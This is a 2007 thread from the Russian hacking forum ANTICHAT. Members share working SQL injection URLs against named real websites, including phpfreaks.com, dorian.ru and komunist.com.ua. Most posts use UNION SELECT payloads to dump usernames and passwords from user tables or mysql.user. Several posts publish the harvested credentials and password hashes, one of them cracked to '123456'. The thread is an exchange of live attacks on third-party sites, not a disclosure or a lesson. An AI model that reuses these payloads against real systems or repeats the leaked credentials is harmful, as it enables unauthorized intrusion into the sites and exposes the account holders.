HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.03.2007, 19:35
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
С нами: 10467686

Репутация: 930


По умолчанию

telemir.com.ua

Код:
http://telemir.com.ua/news/news.html?id=-1+union+select+1,2,concat(user_name,char(58),user_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users/*
Admin:Admin мда...


http://telemir.com.ua/admin - убогейшая, вообще ничего нету =(
 
Ответить с цитированием

  #2  
Старый 21.03.2007, 20:12
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами: 10160966

Репутация: 1719


По умолчанию

dorian.ru
Код:
http://www.dorian.ru/catalog/dog.php?screen=1&id=-1+union+select+concat(name,0x3a,password),2,3,4,5,6+from+users+limit+0,1/*
admin:e10adc3949ba59abbe56e057f20f883e
upd: pass=123456

Последний раз редактировалось n1†R0x; 21.03.2007 в 20:19..
 
Ответить с цитированием

  #3  
Старый 21.03.2007, 20:32
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
С нами: 10467686

Репутация: 930


По умолчанию

gostudy.com.ua

нимагу больше =((

Код HTML:
Error in query The used SELECT statements have a different number of columns
Код:
http://gostudy.com.ua/view.phtml?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102/*
 
Ответить с цитированием

  #4  
Старый 21.03.2007, 20:50
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
С нами: 10686686

Репутация: 447
По умолчанию

Цитата:
Сообщение от Ksander  
gostudy.com.ua

нимагу больше =((

Код HTML:
Error in query The used SELECT statements have a different number of columns
Код:
http://gostudy.com.ua/view.phtml?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102/*
вот, немножко в другом месте
вывод в title http://gostudy.com.ua/forum.phtml?theme_id=-61+union+select+database()+from+users/*
 
Ответить с цитированием

  #5  
Старый 21.03.2007, 20:52
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами: 10483586

Репутация: 5826


По умолчанию

Так и не подобрал таблицу с пользователями(

Код:
http://books.inmsk.ru/full_descript.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,convert(database(),char),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57/*
 
Ответить с цитированием

  #6  
Старый 21.03.2007, 20:54
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами: 10160966

Репутация: 1719


По умолчанию

phpfreaks.com
Код:
http://www.phpfreaks.com/user.php?cmd=view&user_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,concat(username,0x3a,password),27,28,29,30,31,32,33,34,35,36,37,38,39+from+user+limit+0,1/*
36-37 тысяч юзеров..
phpfreak:d3d69778807f411f07768dd5ae7f194e:37
 
Ответить с цитированием

  #7  
Старый 21.03.2007, 20:56
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
С нами: 10085717

Репутация: 590
По умолчанию

Код:
http://www.diariodemadryn.com/vernoti.php?ID=63708+union+select+1,2,3,version(),user(),database(),7,8,9,10+limit+1,1/*
www.mysql-hispano.org
Код:
http://www.mysql-hispano.org/page.php?id=43%20UNION%20SELECT%20version(),2+limit+1,1/*
Код:
http://sololiteratura.com/php/autor.php?id=-3+union+select+1,database(),version()/*
Код:
http://www.agenciapulsar.org/coberturas_det.php?id=-14+union+select+1,2,3,version()/*

Последний раз редактировалось XTErner; 21.03.2007 в 21:30..
 
Ответить с цитированием

  #8  
Старый 21.03.2007, 22:00
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
С нами: 10467686

Репутация: 930


По умолчанию

А вот и скуля у падлючих комуняк.

www.komunist.com.ua

Код:
http://www.komunist.com.ua/?news_id=9999+union+select+convert(version(),char)+from+users/*





p.s.эх спасибо Грею, так бы до бесконечности подбирал еслиб не тайтл =)

Последний раз редактировалось Ksander; 21.03.2007 в 22:02..
 
Ответить с цитированием

  #9  
Старый 21.03.2007, 22:04
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами: 10483586

Репутация: 5826


По умолчанию

Вроде колонка pass только ничего не выводит...

Код:
http://bvp.ru/libs/list.php?tid=-1+union+select+1,concat(id,char(58),name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+autors+limit+21,1/*
Код:
http://www.ont.by/index.php?id_sport=6&id=-1+union+select+1,2,3,database(),5,6,7,8,9,10,11/*
 
Ответить с цитированием

  #10  
Старый 21.03.2007, 23:12
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами: 10160966

Репутация: 1719


По умолчанию

Цитата:
Сообщение от Grey  
Вроде колонка pass только ничего не выводит...
Код:
http://www.acana.ru/acana.php?razdel_id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6+from+mysql.user+limit+0,1/*
аналогичная ситуация..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.